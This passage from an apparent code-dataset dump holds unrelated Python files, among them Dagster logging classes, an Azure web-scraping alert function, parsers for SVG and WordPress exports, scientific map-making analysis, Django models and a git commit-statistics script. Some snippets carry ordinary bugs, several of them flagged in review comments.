        return self.dagster_event.event_type_value
class DagsterLoggingMetadata(
    NamedTuple(
        "_DagsterLoggingMetadata",
        [
            ("run_id", Optional[str]),
            ("pipeline_name", Optional[str]),
            ("pipeline_tags", Dict[str, str]),
            ("step_key", Optional[str]),
            ("solid_name", Optional[str]),
            ("resource_name", Optional[str]),
            ("resource_fn_name", Optional[str]),
        ],
    )
):
    """Internal class used to represent the context in which a given message was logged (i.e. the
    step, pipeline run, resource, etc.)
    """

    def __new__(
        cls,
        run_id: str = None,
        pipeline_name: str = None,
        pipeline_tags: Dict[str, str] = None,
        step_key: str = None,
        solid_name: str = None,
        resource_name: str = None,
        resource_fn_name: str = None,
    ):
        # Normalize pipeline_tags so downstream code can always assume a dict.
        return super().__new__(
            cls,
            run_id=run_id,
            pipeline_name=pipeline_name,
            pipeline_tags=pipeline_tags or {},
            step_key=step_key,
            solid_name=solid_name,
            resource_name=resource_name,
            resource_fn_name=resource_fn_name,
        )

    @property
    def log_source(self):
        # Origin label for the log line: the resource when set, otherwise the
        # pipeline name (or "system" when neither is known).
        if self.resource_name is None:
            return self.pipeline_name or "system"
        return f"resource:{self.resource_name}"

    def to_tags(self) -> Dict[str, str]:
        # converts all values into strings
        return {k: str(v) for k, v in self._asdict().items()}
def construct_log_string(
    logging_metadata: DagsterLoggingMetadata, message_props: DagsterMessageProps
) -> str:
    """Assemble the human-readable log line: the truthy context fields joined
    by ' - ', followed by the event's error text (if any)."""
    candidates = (
        logging_metadata.log_source,
        logging_metadata.run_id,
        message_props.pid,
        logging_metadata.step_key,
        message_props.event_type_value,
        message_props.orig_message,
    )
    prefix = " - ".join(part for part in candidates if part)
    return prefix + (message_props.error_str or "")
class DagsterLogManager(logging.Logger):
    """Logger that stamps Dagster run/step context onto every record and fans
    records out to a set of user-provided loggers as well as its own handlers."""

    def __init__(
        self,
        logging_metadata: DagsterLoggingMetadata,
        loggers: List[logging.Logger],
        handlers: Optional[List[logging.Handler]] = None,
    ):
        self._logging_metadata = check.inst_param(
            logging_metadata, "logging_metadata", DagsterLoggingMetadata
        )
        self._loggers = check.list_param(loggers, "loggers", of_type=logging.Logger)
        super().__init__(name="dagster", level=logging.DEBUG)
        handlers = check.opt_list_param(handlers, "handlers", of_type=logging.Handler)
        for handler in handlers:
            self.addHandler(handler)

    @property
    def logging_metadata(self) -> DagsterLoggingMetadata:
        return self._logging_metadata

    @property
    def loggers(self) -> List[logging.Logger]:
        return self._loggers

    def log_dagster_event(self, level: int, msg: str, dagster_event: "DagsterEvent"):
        # The event rides along in `extra` and is unpacked again in _log.
        self.log(level=level, msg=msg, extra={DAGSTER_META_KEY: dagster_event})

    def log(self, level, msg, *args, **kwargs):
        # allow for string level names
        super().log(coerce_valid_log_level(level), msg, *args, **kwargs)

    def _log(
        self, level, msg, args, exc_info=None, extra=None, stack_info=False
    ):  # pylint: disable=arguments-differ
        # we stash dagster meta information in the extra field
        extra = extra or {}

        dagster_message_props = DagsterMessageProps(
            orig_message=msg, dagster_event=extra.get(DAGSTER_META_KEY)
        )

        # convert the message to our preferred format
        msg = construct_log_string(self.logging_metadata, dagster_message_props)

        # combine all dagster meta information into a single dictionary
        meta_dict = {
            **self.logging_metadata._asdict(),
            **dagster_message_props._asdict(),
        }
        # step-level events can be logged from a pipeline context. for these cases, pull the step
        # key from the underlying DagsterEvent
        if meta_dict["step_key"] is None:
            meta_dict["step_key"] = dagster_message_props.step_key

        extra[DAGSTER_META_KEY] = meta_dict

        # forward to the user-provided loggers first, then emit via our own handlers
        for logger in self._loggers:
            logger.log(level, msg, *args, extra=extra)

        super()._log(level, msg, args, exc_info=exc_info, extra=extra, stack_info=stack_info)

    def with_tags(self, **new_tags):
        """Add new tags in "new_tags" to the set of tags attached to this log manager instance, and
        return a new DagsterLogManager with the merged set of tags.

        Args:
            tags (Dict[str,str]): Dictionary of tags

        Returns:
            DagsterLogManager: a new DagsterLogManager namedtuple with updated tags for the same
                run ID and loggers.
        """
        return DagsterLogManager(
            logging_metadata=self.logging_metadata._replace(**new_tags),
            loggers=self._loggers,
            handlers=self.handlers,
        )
7,923 | a9b895e4d0830320276359944ca6fdc475fd144e | """
函数对象有一个__defaults__属性,是保存定位参数和关键字参数默认值的元组,
仅限关键字参数默认值在__kwdefaults__属性中,参数的名称在__code__属性中(__code__本身是对象引用,有很多属性)
使用inspect模块提取函数签名更加方便,很多框架和IDE都是以此来验证代码的
"""
def tag(name, *content, cls=None, **attrs):
    """Generate one or more HTML tags.

    Each positional item in *content* becomes its own element; with no
    content a self-closing tag is produced.  `cls` maps to the `class`
    attribute (a reserved word in Python).
    """
    if cls is not None:
        attrs['class'] = cls
    pairs = [' %s="%s"' % (key, value) for key, value in attrs.items()]
    attrs_str = ''.join(pairs)
    if not content:
        return '<%s%s />' % (name, attrs_str)
    return '\n'.join('<%s%s>%s</%s>' % (name, attrs_str, item, name)
                     for item in content)
# Raw introspection via the function object's own attributes.
print(
    tag.__defaults__,
    tag.__code__,
    tag.__code__.co_varnames,
    tag.__code__.co_argcount,
    sep = '\n'
)
print()

from inspect import signature
sig = signature(tag)
print(sig)
for name, param in sig.parameters.items():  # `name` equals param.name
    print(param.kind, ':', name, '=', param.default)
print()

# signature() returns an inspect.Signature whose `parameters` attribute is an
# ordered mapping of inspect.Parameter objects (name, default, kind,
# annotation).  Signature.bind maps arbitrary arguments onto the formals.
my_tag = {
    'name': 'img',
    'title': 'Sunset',
    'src': 'sunset.jpg',
    'cls': 'framed'
}
bound_args = sig.bind(**my_tag)
print(bound_args)
for name, value in bound_args.arguments.items():  # an OrderedDict-like mapping
    print(name, '=', value)
|
7,924 | 670a23aa910a6709735281b7e64e5254a19277c6 | import datetime
import logging
import os
import requests
from bs4 import BeautifulSoup
import telebot
from azure.storage.blob import BlobClient
import hashlib
import azure.functions as func
def hash_string(input_string: str) -> str:
    """Return the hex SHA-256 digest of *input_string* (UTF-8 encoded)."""
    digest = hashlib.sha256(input_string.encode("utf-8"))
    return digest.hexdigest()
def main(mytimer: func.TimerRequest) -> None:
    """Timer-triggered watcher: scrape TargetUrl for links containing
    SearchTerm, snapshot them to blob storage, and send a Telegram message
    when the hashed link set changes."""
    utc_timestamp = datetime.datetime.utcnow().replace(
        tzinfo=datetime.timezone.utc).isoformat()

    if mytimer.past_due:
        logging.info('The timer is past due!')

    logging.info('Python timer trigger function ran at %s', utc_timestamp)

    # All configuration comes from app settings.
    url = os.environ['TargetUrl']
    search_term = os.environ['SearchTerm']

    reqs = requests.get(url)
    soup = BeautifulSoup(reqs.text, 'html.parser')
    # NOTE(review): `token` is already a TeleBot instance here, yet it is
    # passed to telebot.TeleBot() again below — confirm the intended API.
    token = telebot.TeleBot(os.environ['TelebotToken'])
    chat_id = os.environ['TelebotChatId']

    urls = []
    for link in soup.find_all('a'):
        link_url = link.get('href')
        # Add only links that contain the search term
        if search_term in link_url:
            urls.append(link_url)

    logging.info(f"Looking for: {search_term}")
    logging.info(f"Urls conatining the pattern: {urls}")

    # Hash the semicolon-joined link list; a changed hash means new/removed links.
    lst_to_str = ';'.join([str(i) for i in urls])
    new_hash = hash_string(lst_to_str)

    # Archive today's snapshot under urls/YYYY/MM/DD/.
    now = datetime.datetime.now()
    file_suffix = now.strftime("%Y%m%d%I%M%S")
    year = now.year
    month = now.month
    day = now.day
    blob = BlobClient.from_connection_string(
        conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name=f'urls/{year}/{month}/{day}/html-{file_suffix}.html')
    blob.upload_blob(lst_to_str, blob_type='BlockBlob')

    logging.info(new_hash)
    # Compare against the previously stored hash, then store the new one.
    blob = BlobClient.from_connection_string(
        conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name='hash.tmp')
    blob_hash = ''
    if blob.exists():
        # NOTE(review): readall() returns bytes; str(bytes) yields "b'...'",
        # which can never equal the hex digest string — was .decode() intended?
        blob_hash = str(blob.download_blob().readall())
        if blob_hash != new_hash:
            message = f'Hash of this page: {url} has changed'
            bot = telebot.TeleBot(token)
            bot.config['api_key'] = token
            bot.send_message(chat_id, message)
        blob.delete_blob()
    blob.upload_blob(new_hash, blob_type='BlockBlob')
    logging.info(f'Old hash >>>> {blob_hash}')
    logging.info(f'New hash >>>> {new_hash}')
|
7,925 | d514413c303dd174d8f56685158780a1681e1aba | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 2 08:04:11 2019
@author: yocoy
"""
import serial, time
arduino = serial.Serial('COM7', 9600)
time.sleep(4)  # give the Arduino time to reset after the port opens

# Capture 100 raw lines from the serial port, then release it.
lectura = []
for i in range(100):
    lectura.append(arduino.readline())
arduino.close()
print(lectura)
7,926 | f9d1013fa278b9078e603b012abbdde0be2e0962 | def del_ops3(str1, str2):
    # find all common letters in both strings
    common1 = [x for x in str1 if x in str2]
    common2 = [x for x in str2 if x in str1]
    # keep common1 as the shorter of the two projections
    if len(common2) < len(common1):
        common1, common2 = common2, common1
    # find total of strings with 0, 1, or 2 characters, (2 chars - only if c1 != c2)
    if len(common1) == 0 or len(common2) == 0:
        total = len(str1) + len(str2)
    elif (len(common1) == 1 or len(common2) == 1) or (len(common1) == 2 and len(common2) == 2 and common1 != common2):
        total = (len(str1) - 1) + (len(str2) - 1)
    # else, if 2 characters in c1, c2 and c1 != c2 or > 2 characters in c1, c2
    else:
        # create references to c2 indexes of each letter in c1
        # NOTE(review): defaultdict is never imported in this file, so this
        # branch raises NameError as written.
        refs = defaultdict(list)
        for i, letter in enumerate(common2):
            refs[letter].append(i)
        # find all letters that follow each other (same order) in both strings
        substring = []  # substring == all common letters in same sequence in both strings
        previous = min(refs[common1[0]])
        for i, letter in enumerate(common1):
            # if any c2 index of the current letter in c1 is > the c2 index of previous letter:
            # the current letter follows the previous letter in both c1 and c2
            if any([i > previous for i in refs[letter]]) and all([i != previous for i in refs[letter]]):
                # if the same letter at the same index is not already in substring:
                if all([hash(x) != hash(common2[previous]) for x in substring]):
                    substring.append(common2[previous])
                substring.append(letter)
                previous = min([x for x in refs[letter] if x >= previous])
                # next iteration of previous is always == the smallest index
                # of the current letter that is >= current iteration of previous
                # (always > previous if not first iteration in c1)
                # indexes are never repeated or skipped
            # elif the letter does not follow the same letter in both strings:
            # previous = smallest c2 index of letter that broke sequence/did not follow in both strings
            # NOTE(review): `all(refs[letter]) < previous` compares a bool to
            # an int — probably meant all(i < previous for i in refs[letter]).
            elif all(refs[letter]) < previous:
                previous = min([x for x in refs[letter]])
            # NOTE(review): leftover debug print.
            print(i, previous, letter, substring)
        # total == total of all letters - (number of letters in substring * 2)
        total = (len(str1) - len(substring)) + (len(str2) - len(substring))
    # NOTE(review): `substring` is only bound in the else-branch above, so the
    # early branches make this raise NameError; `total` is computed but never
    # returned — confirm which result was intended.
    return "".join(substring)
|
7,927 | f819d1b1f2f6f3052247cda592007eac40aca37a | #!/usr/bin/env python3
# -*- coding: ascii -*-
"""
A script removing animations from SVG graphics.
"""
import sys, os, re
# etree fails utterly at producing nice-looking XML
from xml.dom import minidom
def process(inpt, outp):
    """Strip SVG animation markup from *inpt* and write the result to *outp*.

    Removes <animate>/<animateTransform> elements and any <style>/<script>
    element whose key attribute is "animation", then collapses the blank
    lines the removals leave behind.

    `inpt` and `outp` are file-like objects (text mode).
    """
    def traverse(node):
        # Iterate over a snapshot: childNodes is a live NodeList, and
        # removing a child while iterating it directly skips the following
        # sibling (e.g. the second of two consecutive <animate> elements).
        for child in list(node.childNodes):
            if child.nodeType != minidom.Node.ELEMENT_NODE:
                continue
            elif child.tagName in ('animate', 'animateTransform'):
                node.removeChild(child)
            elif child.tagName in ('style', 'script'):
                if child.getAttribute('key') == 'animation':
                    node.removeChild(child)
            else:
                traverse(child)
        node.normalize()
        if len(node.childNodes) == 0: return
        # Collapse whitespace-only text runs left at the edges of this node.
        for child in (node.childNodes[0], node.childNodes[-1]):
            if child.nodeType != minidom.Node.TEXT_NODE:
                continue
            if not child.data.isspace() or child.data.count('\n') <= 1:
                continue
            if len(node.childNodes) == 1:
                node.removeChild(child)
                return
            child.data = re.sub(r'\n.*\n', r'\n', child.data)
    document = minidom.parse(inpt)
    traverse(document.documentElement)
    outp.write('<?xml version="1.0" encoding="utf-8"?>\n')
    document.documentElement.writexml(outp)
    outp.write('\n')
def main():
    """Command-line entry point: `<prog> input output`."""
    if len(sys.argv) != 3:
        sys.stderr.write('USAGE: %s input output\n' % sys.argv[0])
        sys.stderr.flush()
        # Exit non-zero: a usage error is a failure.  The original exited 0,
        # which hides the mistake from shell scripts and build systems.
        sys.exit(1)
    with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:
        process(inpt, outp)

if __name__ == '__main__': main()
|
7,928 | 86a15bb2e4d59fb5c8763fa2de31164beb327685 | import re
from xml.etree import ElementTree
def get_namespace(xml_path):
    """Map each xmlns prefix declared in the file to its namespace URI."""
    with open(xml_path) as handle:
        declarations = re.findall(r"xmlns:(.*?)=\"(.*?)\"", handle.read())
    return dict(declarations)
def get_comic_data(item, ns):
    """Flatten one WXR <item> element into a plain comic dict.

    `ns` is the prefix->URI map needed to resolve content:encoded.
    `path` and `alt_text` are left blank for the caller to fill in.
    """
    return {
        "title": item.find("title").text,
        "post_date": item.find("pubDate").text,
        "path": "",
        "guid": item.find("guid").text,
        "alt_text": "",
        "tags": [child.text for child in item.findall("category")],
        "text": item.find("content:encoded", ns).text,
    }
def get_comics(xml_path):
    """Parse a WordPress WXR export and return one dict per comic <item>.

    Asserts the file really is an RSS/WXR 1.2 document before extracting.
    """
    ns = get_namespace(xml_path)
    tree = ElementTree.parse(xml_path)
    root = tree.getroot()
    assert root.tag == "rss"
    channel = root[0]
    assert channel.tag == "channel"
    version = channel.find("wp:wxr_version", ns).text
    assert version == "1.2"
    return [get_comic_data(item, ns) for item in channel.findall("item")]
|
7,929 | f7e2fc7b5420b90f733a9520b75555bd869cea98 | class TreeNode(object):
"""
Implementation of a TreeNode
A TreeNode is a Node with a value and a list of children. Each child is also
a TreeNode
Class invariants:
- self.value: The value for this TreeNode : Any
- self.children: The list of children for this Node : TreeNode List
"""
    def __init__(self, value, parent = None):
        """
        Initializes a TreeNode

        Parameter value: the value for this TreeNode
        Parameter parent: the parent TreeNode, or None for a root node

        Class invariants:
        - self.value: The value for this TreeNode : Any
        - self.children: The list of children for this Node : TreeNode List
        - self.parent: The parent TreeNode (None for the root) : TreeNode
        """
        self.value = value
        self.children = []
        self.parent = parent
def add_child(self, value):
"""
Adds a value to the list of children for this node
Parameter value: the value to add to the Tree
Precondition: value is not a TreeNode
"""
assert type(value) != TreeNode
self.children.append(TreeNode(value, self))
def height(self):
"""
The height of the Tree
This function recursively computes the height of the tree from the root.
It computes the height of each child and returns the maximum height
Returns: the height of the tree (int)
"""
if self.children == []:
return 1
else:
arr = []
for child in self.children:
result = 1 + child.height()
arr.append(result)
return max(arr)
    def get_children(self):
        """
        Returns: the children for this tree (TreeNode List)
        """
        return self.children
    def get_value(self):
        """
        Returns: the value for this TreeNode
        """
        return self.value
7,930 | 61a58b934c6663e87824e4f9f9ffd92c3236947c | from django.db import models
class Link(models.Model):
    """A labelled hyperlink: display text plus target URL."""

    text = models.CharField(max_length=100)
    link = models.URLField()

    def __str__(self):
        # Shown in the admin and anywhere the object renders as text.
        return self.text
|
7,931 | bcb028bd25732e17ed1478e122ac3b2d1abf2520 | from __future__ import division
from pyoperators import pcg
from pysimulators import profile
from qubic import (
create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition,
QubicPlanckAcquisition, QubicInstrument)
from qubic.data import PATH
from qubic.io import read_map
import healpy as hp
import matplotlib.pyplot as mp
import numpy as np
def statstr(vec):
    """Format the mean and standard deviation of *vec* as 'm +/- s' (4 d.p.)."""
    return '{0:.4f} +/- {1:.4f}'.format(np.mean(vec), np.std(vec))
def plotinst(inst,shift=0.12):
    """Scatter the instrument's detector centres: quadrants 0-3 in red,
    4+ in blue shifted right by *shift*.

    NOTE(review): relies on pylab-style global plot/xlim being in scope.
    """
    for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
        if quad < 4:
            plot(xyc[0],xyc[1],'ro')
        else:
            plot(xyc[0]+shift,xyc[1],'bo')
    xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
    """Draw gnomonic I/Q/U views of *input* around the field centre and
    return the three projected maps.

    NOTE(review): the mutable default Trange is shared across calls, and
    `input`/`map` shadow builtins — kept to preserve the public signature.
    """
    out = []
    for i, (kind, lim) in enumerate(zip('IQU', Trange)):
        map = input[..., i]
        out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
                            max=lim, title=msg + ' ' + kind,
                            sub=(3, 3, iplot + i), return_projected_map=True)]
    return out
def profile(x,y,range=None,nbins=10,fmt=None,plot=True, dispersion=True, color=None):
    """Bin-averaged profile of y versus x.

    Splits [range[0], range[1]] (default: min/max of x) into `nbins` equal
    bins and returns (bin centres, mean of y per bin, half bin width,
    scatter of y per bin).  With dispersion=False the scatter is divided by
    sqrt(N) to give the error on the mean.  When plot=True the points are
    drawn with the pylab-style global `errorbar`.

    Note: the `range` parameter deliberately shadows the builtin (kept for
    backward compatibility), and this definition shadows the `profile`
    imported from pysimulators at the top of the file.
    """
    if range is None:  # fixed: was the non-idiomatic `range == None`
        mini = np.min(x)
        maxi = np.max(x)
    else:
        mini = range[0]
        maxi = range[1]
    dx = (maxi - mini) / nbins
    xmin = np.linspace(mini, maxi - dx, nbins)
    xmax = xmin + dx
    xc = xmin + dx / 2
    yval = np.zeros(nbins)
    dy = np.zeros(nbins)
    dx = np.zeros(nbins) + dx / 2
    for i in np.arange(nbins):
        # Strict inequalities: points exactly on a bin edge are dropped.
        ok = (x > xmin[i]) & (x < xmax[i])
        yval[i] = np.mean(y[ok])  # NaN (with a RuntimeWarning) for empty bins
        if dispersion:
            fact = 1
        else:
            fact = np.sqrt(len(y[ok]))
        dy[i] = np.std(y[ok]) / fact
    if plot: errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
    return xc, yval, dx, dy
nside = 256
racenter = 0.0  # deg
deccenter = -57.0  # deg
center = equ2gal(racenter, deccenter)

# Input sky plus a random scan: 1000 pointings in a 10-degree radius.
sky = read_map(PATH + 'syn256_pol.fits')
sampling = create_random_pointings([racenter, deccenter], 1000, 10)

all_solutions_fusion = []
all_coverages = []

# Scale the detector NEP so the total integration time stays one year
# regardless of the number of pointings.
nbptg = np.linspace(1000,5000,5)
correct_time = 365*86400./(nbptg/1000)
detector_nep = 4.7e-17/np.sqrt(correct_time / len(sampling)*sampling.period)

# NOTE(review): `all_instruments` is never defined in this script, so this
# loop raises NameError as written — presumably len(nbptg) was intended.
for i in xrange(len(all_instruments)):
    acq_qubic = QubicAcquisition(150, sampling, nside=nside,
                                 detector_nep=detector_nep[i])
    all_coverages.append(acq_qubic.get_coverage())
    convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
    acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky)
    acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
    # Solve the map-making normal equations H^T N^-1 H x = H^T N^-1 d by
    # preconditioned conjugate gradient.
    H = acq_fusion.get_operator()
    invntt = acq_fusion.get_invntt_operator()
    obs = acq_fusion.get_observation()
    A = H.T * invntt * H
    b = H.T * invntt * obs
    solution_fusion = pcg(A, b, disp=True)
    all_solutions_fusion.append(solution_fusion)
# Only keep pixels with at least a tenth of the peak coverage.
mask = all_coverages[0] > np.max(all_coverages[0]/10)
reso=3
Trange=[10, 10, 10]
# One residual (reconstruction minus convolved input) figure per configuration.
for i in xrange(len(nbptg)):
    figure(i)
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    resid[~mask,:] = 0
    display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
    print(std(resid[mask,0]), std(resid[mask,1]), std(resid[mask,2]))
#savefig(names[i]+'.png')
# --- RMS of the residuals vs. normalized coverage ---------------------------
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    # Binned profiles of the I/Q/U residuals against normalized coverage.
    idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1], color=cols[i], plot=False)
    qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1], color=cols[i], plot=False)
    udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1], color=cols[i], plot=False)
    # Intensity panel; for i == 0 a dashed sqrt(2)-scaled reference is added.
    subplot(3,1,1)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('I RMS residuals')
    ylim(0.1, 2)
    plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
    if i==0: plot(idata[0], idata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
    # Q panel.
    subplot(3,1,2)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('Q RMS residuals')
    ylim(0.1, 2)
    plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
    if i==0: plot(qdata[0], qdata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
    # U panel.
    subplot(3,1,3)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('U RMS residuals')
    ylim(0.1, 2)
    plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
    if i==0: plot(udata[0], udata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
#savefig('rms.png')
# --- Same RMS curves, shown as a ratio to the first (full) instrument -------
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1], color=cols[i], plot=False)
    qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1], color=cols[i], plot=False)
    udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1], color=cols[i], plot=False)
    # The first configuration (i == 0) is the reference all curves are divided by.
    if i == 0 :
        theidata = idata
        theqdata = qdata
        theudata = udata
    subplot(3,1,1)
    xlabel('Normalized coverage')
    ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0., 3)
    # Horizontal sqrt(2) guide line.
    plot(linspace(0,1,10), np.zeros(10)+sqrt(2), 'k--')
    plot(idata[0], idata[3]/theidata[3], color=cols[i], label=names[i], lw=2)
    legend(fontsize=fs, loc='upper right')
    subplot(3,1,2)
    xlabel('Normalized coverage')
    ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0., 3)
    plot(qdata[0], qdata[3]/theqdata[3], color=cols[i], label=names[i], lw=2)
    plot(linspace(0,1,10), np.zeros(10)+sqrt(2), 'k--')
    legend(fontsize=fs, loc='upper right')
    subplot(3,1,3)
    xlabel('Normalized coverage')
    ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0., 3)
    plot(udata[0], udata[3]/theudata[3], color=cols[i], label=names[i], lw=2)
    plot(linspace(0,1,10), np.zeros(10)+sqrt(2), 'k--')
    legend(fontsize=fs, loc='upper right')
#savefig('rms_ratio.png')
|
7,932 | 7a359d4b31bd1fd35cd1a9a1de4cbf4635e23def | """
Write a program that prompts for the user’s favorite number.
Use json.dump() to store this number in a file. Write a separate program that reads in this value and
prints the message, “I know your favorite number! It’s _____.”
"""
import json
# Where the favourite number is persisted for the companion reader program.
file_name = 'supporting_files/favourite_number.json'
favourite_number = input('Enter you favourite number')
# Fix: open in 'w', not 'a' -- appending a second JSON value on a re-run
# corrupts the file, since json.load() can only parse a single top-level value.
with open(file_name, 'w') as file_object:
    json.dump(favourite_number, file_object)
print(f'{favourite_number} is saved in {file_name}')
|
7,933 | 1e853d58c2066f3fbd381d0d603cd2fcece0cf15 | # Generated by Django 3.1.7 on 2021-05-05 23:28
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: renames ``hotel_decription`` to
    ``hotel_description`` and constrains ``hotelstars`` to the choices 1-6."""

    dependencies = [
        ('travels', '0011_auto_20210505_2230'),
    ]

    operations = [
        # Fix the typo in the field name (decription -> description).
        migrations.RenameField(
            model_name='trip',
            old_name='hotel_decription',
            new_name='hotel_description',
        ),
        # Restrict the star rating to the discrete values 1..6.
        migrations.AlterField(
            model_name='trip',
            name='hotelstars',
            field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6)], verbose_name='Gwiazdki hotelu'),
        ),
    ]
|
7,934 | 16446c2c5612a14d4364cbefb949da0b473f7454 | import contextlib
import datetime
import fnmatch
import os
import os.path
import re
import subprocess
import sys
import click
import dataset
def get_cmd_output(cmd):
    """Run *cmd* through the shell and return its combined stdout/stderr as text.

    Output of a failing command is returned as well (the CalledProcessError
    is swallowed); bytes are decoded as UTF-8 with a latin-1 fallback.
    """
    try:
        raw = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as ex:
        raw = ex.output
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("latin1")
def load_commits(db, repo_name):
    """Load the commits from the current directory repo.

    Runs ``git log`` with a custom record format, parses each record into a
    dict (date/hash/auth/name/subj + free-form body), annotates it via
    analyze_commit() and inserts it into the ``commits`` table of *db*,
    tagged with *repo_name*.
    """
    # Record separator; chosen so it cannot appear in real commit text.
    SEP = "-=:=-=:=-=:=-=:=-=:=-=:=-=:=-"
    GITLOG = f"git log --no-merges --format='format:date: %aI%nhash: %H%nauth: %aE%nname: %aN%nsubj: %s%n%b%n{SEP}'"
    # Number of "key: value" header lines at the top of each record.
    SHORT_LINES = 5
    # Example of the raw format being parsed:
    # $ git log --format="format:---------------------%ndate: %aI%nhash: %H%nauth: %aE%nname: %aN%nsubj: %s%n%b"
    # ---------------------
    # date: 2021-04-21T16:13:23-04:00
    # hash: efa13ff1d2fb3d8b2ddee8be0868ae60f9bc35a6
    # auth: julia.eskew@edx.org
    # name: Julia Eskew
    # subj: fix: TNL-8233: Change exception raised at problem creation failure from generic exception to LoncapaProblemError. (#27361)
    # Raising this specific exception will cause the failure to be handled more gracefully by problem rescoring code.
    # ---------------------
    # date: 2021-04-15T21:36:47-04:00
    # hash: a1fe3d58dc112bd975f1237baaee787ba22929f1
    # auth: astaubin@edx.org
    # name: Albert (AJ) St. Aubin
    # subj: [bug] Corrected issue where program dash showed incorrect completed count
    # [MICROBA-1163]
    #
    # This change will correct an issue in the Program Dashboard where a user
    # would see a course as completed, but not see their Certificate because
    # it was not available to them yet.
    # ---------------------
    with db:
        commit_table = db["commits"]
        log = get_cmd_output(GITLOG)
        for i, commit in enumerate(log.split(SEP + "\n")):
            if commit:
                # Split off the 5 header lines; the remainder is the body.
                lines = commit.split("\n", maxsplit=SHORT_LINES)
                row = {"repo": repo_name}
                for line in lines[:SHORT_LINES]:
                    key, val = line.split(": ", maxsplit=1)
                    row[key] = val
                row["body"] = lines[SHORT_LINES].strip()
                analyze_commit(row)
                commit_table.insert(row)
# Subject-line patterns.  STRICT accepts only the canonical conventional-commit
# labels; LAX accepts any "word:" or "word(scope):" prefix, case-insensitively.
STRICT = r"""(?x)
^
(?P<label>build|chore|docs|feat|fix|perf|refactor|revert|style|test|temp)
(?P<breaking>!?):\s
(?P<subjtext>.+)
$
"""

LAX = r"""(?xi)
^
(?P<label>\w+)
(?:\(\w+\))?
(?P<breaking>!?):\s
(?P<subjtext>.+)
$
"""


def analyze_commit(row):
    """Annotate *row* (in place) with conventional-commit metadata.

    Sets the "conventional"/"lax" flags; when either pattern matches the
    subject, also sets "label", "breaking" and "subjtext".  "bodylines" is
    always set to the number of lines in the body.
    """
    row["conventional"] = row["lax"] = False
    match = re.search(STRICT, row["subj"])
    if match:
        row["conventional"] = True
    else:
        match = re.search(LAX, row["subj"])
        row["lax"] = match is not None
    if match:
        row["label"] = match["label"]
        row["breaking"] = bool(match["breaking"])
        row["subjtext"] = match["subjtext"]
    row["bodylines"] = len(row["body"].splitlines())
@contextlib.contextmanager
def change_dir(new_dir):
    """Temporarily chdir into *new_dir*.

    Context manager: yields the new working directory and restores the
    previous one on exit, even if the body raises.
    """
    previous = os.getcwd()
    os.chdir(new_dir)
    try:
        yield os.getcwd()
    finally:
        os.chdir(previous)
@click.command(help="Collect stats about commits in local git repos")
@click.option("--db", "dbfile", default="commits.db", help="SQLite database file to write to")
@click.option("--ignore", multiple=True, help="Repos to ignore")
@click.option("--require", help="A file that must exist to process the repo")
@click.argument("repos", nargs=-1)
def main(dbfile, ignore, require, repos):
    """Walk the given repo directories and record their commits in SQLite.

    Repos matching an --ignore glob, or missing the --require file, are
    skipped.  Each repo is keyed by its last two path components ("org/repo").
    """
    db = dataset.connect("sqlite:///" + dbfile)
    for repo in repos:
        # --ignore patterns are shell-style globs.
        if any(fnmatch.fnmatch(repo, pat) for pat in ignore):
            print(f"Ignoring {repo}")
            continue
        if require is not None:
            if not os.path.exists(os.path.join(repo, require)):
                print(f"Skipping {repo}")
                continue
        print(repo)
